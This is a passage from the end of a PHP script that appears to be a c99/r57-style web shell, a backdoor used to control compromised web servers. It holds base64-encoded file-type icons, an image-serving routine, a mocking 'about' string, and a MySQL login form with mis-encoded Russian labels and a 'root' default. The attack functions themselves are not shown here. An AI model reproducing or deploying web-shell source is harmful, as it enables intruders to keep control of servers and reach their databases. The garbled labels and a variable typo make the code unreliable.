2667"ETbgR3aZmrIlVgAAOw==",
2668"ext_so"=>
2669"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
2670"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
2671"AAA7",
2672"ext_stl"=>
2673"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
2674"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
2675"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
2676"ext_swf"=>
2677"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
2678"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2679"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
2680"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
2681"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
2682"ext_sys"=>
2683"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
2684"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
2685"/aZBVOqkpUa/4KisRC6rEgA7",
2686"ext_tar"=>
2687"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
2688"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
2689"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
2690"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
2691"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2692"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2693"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2694"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
2695"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
2696"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
2697"u4tLAgEAOw==",
2698"ext_theme"=>
2699"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
2700"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
2701"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
2702"FxEAOw==",
2703"ext_txt"=>
2704"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2705"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2706"UpPWG3Ig6Hq/XmRjuZwkAAA7",
2707"ext_url"=>
2708"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
2709"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
2710"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
2711"fRQRADs=",
2712"ext_vbe"=>
2713"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
2714"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
2715"seAwLAEAOw==",
2716"ext_vbs"=>
2717"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
2718"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
2719"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
2720"ext_vcf"=>
2721"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
2722"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
2723"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
2724"ext_wav"=>
2725"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2726"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2727"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2728"ext_wma"=>
2729"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2730"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2731"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2732"ext_wmf"=>
2733"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
2734"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
2735"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
2736"EzWCgwARADs=",
2737"ext_wri"=>
2738"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
2739"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
2740"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
2741"ext_xml"=>
2742"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2743"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2744"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2745"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2746"IQA7",
2747"ext_xsl"=>
2748"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
2749"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2750"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
2751"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
2752"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
2753);
2754$imgequals = array(
2755"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
2756"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
2757"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
2758);
2759 ksort($arrimg);
2760 if (!$getall)
2761 {
2762 header("Content-type: image/gif");
2763 header("Cache-control: public");
2764 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
2765 header("Cache-control: max-age=".(60*60*24*7));
2766 header("Last-Modified: ".date("r",filemtime(__FILE__)));
2767 foreach($imgequals as $k=>$v)
2768 {
2769 if (in_array($img,$v)) {$img = $k;}
2770 }
2771 if (empty($arrimg[$img])) {$img = "small_unk";}
2772 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
2773 echo base64_decode($arrimg[$img]);
2774 }
2775 else
2776 {
2777 echo "<center>";
2778 $k = array_keys($arrimg);
2779 foreach ($k as $u)
2780 {
2781 echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
2782 }
2783 echo "</center>";
2784 }
2785 exit;
2786}
2787if ($act == "about")
2788{
2789 $dàta = "Any stupid copyrights and copylefts";
2790 echo $data;
2791}
2792$microtime = round(getmicrotime()-$starttime,4);
2793?>
2794
2795<html>
2796<head>
2797</head>
2798<body>
2799<center> <br><br>
2800<table width=620 cellpadding=0 cellspacing=0 align=center>
2801 <col width=1>
2802 <col width=600>
2803 <col width=1>
2804 <tr> <td></td>
2805 <td align=left class=texte>
2806 <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'>
2807 <table border=0 align=center>
2808 <col>
2809 <col align=left>
2810 <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
2811 Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br>
2812 </td>
2813 </tr>
2814 <tr> <td class=texte>Àäðåñ ñåðâåðà:</td>
2815 <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
2816 </tr>
2817 <tr> <td class=texte>Íàçâàíèå áàçû:</td>
2818 <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
2819 </tr>
2820 <tr> <td class=texte>Ëîãèí:</td>
2821 <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
2822 </tr>
2823 <tr> <td class=texte>Ïàðîëü</td>
2824 <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
2825 </tr>
2826 </table>
2827 <br> <center> <br><br>
2828 <input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
2829 </td>
2830 <td></td>
2831 </tr>
2832 <tr> <td height=1 colspan=3></td>
2833 </tr>
2834 </table> </center>
2835 </body>
2836 </html>